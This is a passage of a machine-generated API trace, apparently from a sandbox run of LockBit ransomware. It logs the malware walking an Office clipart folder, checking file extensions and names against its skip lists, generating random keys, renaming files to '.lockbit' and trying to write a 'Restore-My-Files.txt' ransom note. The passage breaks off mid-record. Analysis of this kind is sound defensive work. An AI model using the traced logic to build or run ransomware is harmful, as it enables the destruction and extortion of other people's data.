nFileSizeHigh=0x0, nFileSizeLow=0x5080, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02405_.WMF", cAlternateFileName="")) returned 1 [0165.060] lstrcmpiW (lpString1=".", lpString2="NA02405_.WMF") returned -1 [0165.060] lstrcmpiW (lpString1="..", lpString2="NA02405_.WMF") returned -1 [0165.060] PathFindExtensionW (pszPath="NA02405_.WMF") returned=".WMF" [0165.060] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.060] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.061] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.061] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02405_.WMF") returned 1 [0165.062] lstrcmpiW (lpString1="ntldr", lpString2="NA02405_.WMF") returned 1 [0165.062] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02405_.WMF") returned 1 [0165.062] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02405_.WMF") returned -1 [0165.062] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02405_.WMF") returned -1 [0165.062] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02405_.WMF") returned 1 [0165.062] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02405_.WMF") returned -1 [0165.062] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.062] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF") returned=".WMF" [0165.062] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.062] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.062] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.063] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.063] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF.lockbit") returned 72 [0165.063] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02405_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0165.064] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.064] malloc (_Size=0x40068) returned 0x3df0008 [0165.064] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20608) returned 1 [0165.064] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.065] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.065] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.065] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.070] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.070] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.070] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.071] free (_Block=0x1fa2ed8) [0165.071] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.071] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.071] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.071] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1fc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02407_.WMF", cAlternateFileName="")) returned 1 [0165.072] lstrcmpiW (lpString1=".", lpString2="NA02407_.WMF") returned -1 [0165.072] lstrcmpiW (lpString1="..", lpString2="NA02407_.WMF") returned -1 [0165.072] PathFindExtensionW (pszPath="NA02407_.WMF") returned=".WMF" [0165.072] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.072] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.073] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.073] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02407_.WMF") returned 1 [0165.074] lstrcmpiW (lpString1="ntldr", lpString2="NA02407_.WMF") returned 1 [0165.074] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02407_.WMF") returned 1 [0165.074] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02407_.WMF") returned -1 [0165.074] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02407_.WMF") returned -1 [0165.074] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02407_.WMF") returned 1 [0165.074] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02407_.WMF") returned -1 [0165.074] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.074] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF") returned=".WMF" [0165.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.074] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.074] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.075] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.075] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF.lockbit") returned 72 [0165.075] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02407_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.076] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.076] malloc (_Size=0x40068) returned 0x3d70450 [0165.076] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=8136) returned 1 [0165.076] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0165.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.077] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0165.077] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0165.082] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.082] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.082] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.084] free (_Block=0x1fa2ed8) [0165.084] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02407_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.084] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.084] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x28ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02413_.WMF", cAlternateFileName="")) returned 1 [0165.084] lstrcmpiW (lpString1=".", lpString2="NA02413_.WMF") returned -1 [0165.084] lstrcmpiW (lpString1="..", lpString2="NA02413_.WMF") returned -1 [0165.084] PathFindExtensionW (pszPath="NA02413_.WMF") returned=".WMF" [0165.084] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.084] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.084] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.084] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.084] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.085] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.086] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.086] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02413_.WMF") returned 1 [0165.086] lstrcmpiW (lpString1="ntldr", lpString2="NA02413_.WMF") returned 1 [0165.086] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02413_.WMF") returned 1 [0165.086] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02413_.WMF") returned -1 [0165.087] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02413_.WMF") returned -1 [0165.087] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02413_.WMF") returned 1 [0165.087] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02413_.WMF") returned -1 [0165.087] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.087] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02413_.WMF") returned=".WMF" [0165.087] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.087] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.087] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.088] lstrcmpiW 